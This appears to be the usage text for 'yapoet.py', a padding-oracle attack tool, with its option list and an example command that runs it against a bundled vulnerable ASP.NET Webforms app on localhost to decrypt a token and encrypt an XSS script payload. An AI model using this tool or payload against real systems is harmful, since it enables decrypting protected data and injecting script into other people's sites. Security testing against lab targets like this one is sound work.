A comprehensive description will be added later. For now, you can try the tool against the included example of a vulnerable ASP.NET Webforms application:

    \Examples\ASP.NET-Webforms\BuildAndRun.cmd
    python yapoet.py -u http://localhost:8080/ -d "aEMei5bwchHQqb6rh17Irg==" -e "<script>alert(/XSS/)</script>" --data="__VIEWSTATE=&Answer=&EncryptedAnswer=%encrypted_data%"

    yapoet.py [options]

    Options:
      -h, --help            show this help message and exit
      -u URL, --url=URL     Target URL (e.g. "http://host.domain/?param1=value%2b1&param2=value%2b2")
      -d ENCRYPTED_DATA, --decrypt=ENCRYPTED_DATA
                            Base64-encoded data to decrypt
      -e PLAINTEXT_DATA, --encrypt=PLAINTEXT_DATA
                            Plaintext data to encrypt (CBC mode only)
      --data=POST_DATA      POST data (e.g. "param1=value%2b1&param2=value%2b1")
      --cookie=COOKIE       HTTP Cookie header value
      --block-size=BLOCK_SIZE
                            Cipher block size [default: 16]
      --iv=IV               Initialization vector (e.g. "0x00,0x01,0x39...") [default: 0x00 * BLOCK_SIZE]
      --mode=MODE           Mode of operation (e.g. "ECB" or "CBC") [default: CBC]
      --encode-func=ENCODE_FUNC
                            Function to encode byte array data to string [default: lambda byte_array:
                            __import__('base64').b64encode(byte_array)]
      --decode-func=DECODE_FUNC
                            Function to decode string from byte array data [default: lambda string:
                            __import__('base64').b64decode(string)]

Please note that the value of at least one of the HTTP-request parameters in the URL, POST_DATA or COOKIE
options should be replaced with an %encrypted_data% placeholder.